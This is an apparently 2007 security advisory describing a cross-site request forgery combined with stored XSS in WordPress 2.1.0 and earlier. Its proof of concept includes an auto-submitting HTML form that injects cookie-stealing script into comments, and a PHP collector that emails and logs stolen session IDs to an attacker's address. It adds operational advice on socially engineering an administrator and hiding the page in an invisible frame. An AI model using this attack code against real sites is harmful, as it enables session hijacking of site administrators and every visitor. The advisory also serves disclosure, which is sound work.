Advisory4-20022007.txt

`---------------------------------------------------------------------------------  
| ____ ____.__ __ |  
| \ \ / /|__|_______/ |_ __ _______ ___ ___ |  
| \ Y / | \_ __ \ __\ | \__ \ \ \/ / |  
| \ / | || | \/| | | | // __ \_> < |  
| \___/ |__||__| |__| |____/(____ /__/\_ \ |  
| \/ \/ |  
| Security without illusions |  
| www.virtuax.be |  
| |  
---------------------------------------------------------------------------------  
  
  
Application: Wordpress  
Vulnerable Versions: <= v2.1.0  
Vulnerability: XSRF with XSS  
  
Vendor: http://www.wordpress.net  
Vendor Status: Notified  
  
Found: 20-02-2007  
Public Release Date: 01-03-2007  
Last modified: 01-03-2007  
Author: ciri  
E-mail: ciri[a.t]virtuax[d.o.t]be  
  
reference: http://www.virtuax.be/advisories/Advisory4-20022007.txt  
  
=================================================================================  
  
Shouts to the VirtuaX Crew & Community!  
Special thanks go out to R4N01 for noticing the XSS!  
  
=================================================================================  
  
  
  
I. Background  
-------------  
  
"WordPress is a state-of-the-art semantic personal publishing platform with a   
focus on aesthetics, web standards, and usability. "  
by wordpress.net  
  
II. Vulnerablity  
----------------  
  
If you're logged in into wordpress as an admin, your comments aren't properly   
sanitized, thus allowing an XSS to be posted. Normally an admin wouldn't input   
XSS input vectors, but we can make them do it with a simple XSRF script.  
  
IIa. Affected Versions  
----------------------  
  
I'm assuming all versions <= 2.1.0 are vulnerable although I have only tested the  
latest version (2.1.0). This should work in all browser that have JavaScript enabled  
(default in most browsers).  
  
III. PoC  
--------  
  
[code=sploit.html]  
<form action="http://example.com/wp-comments-post.php" method="post" name="commentform" id="commentform">  
<textarea name="comment" id="comment">  
<script>String.fromCharCode(x,y,z,q,r,s)+document.cookie;</script>  
</script>  
</textarea>  
  
<input type="hidden" name="comment_post_ID" value="**ID**" />  
</form>  
<script>document.commentform.submit();</script>  
[/code]  
  
[code=steal.php]  
<?php  
//Get the session id  
$id = $_GET["id"];  
  
//Send it to our e-mail  
mail("[email protected]", "Cookie stolen", $id);  
  
//Save a backup  
$file = fopen('log.txt', 'a');  
fwrite($file, $id . "\n\n");  
?>  
[/code]  
  
Notes:   
- **ID** should be the ID of the commentpage in which you want to inject  
the XSS.   
- Replace 'String.fromCharCode(x,y,z,q,r,s)' with the appropiate integers  
which lead to steal.php (you can look them up in an ASCII table)  
eg: http://yoursite.com/steel.php?id=  
String.fromCharCode(104,116,116,112,58,47,47,121,111,117,114,  
115,105,116,101,46,99,111,109,47,115,116,101,101,108,46,112,  
104,112,63,105,100,61);  
We need to do this because Wordpress escapes quotes.  
  
We trick the admin into going to our sploit.html page (should be fairly easy   
using basic social engineering skills). It is recommended that you hide the page  
in a frame with no height, more stealth options are beyond the scope of this  
advisory. Upon entering the page, the admin will post the XSS input vector as a   
comment. Herafter he and EVERY other user that visits the page with comments will   
automatically submit their session_id's to you.  
  
Copyright 2007 by ciri from Virtuax.be All rights reserved.`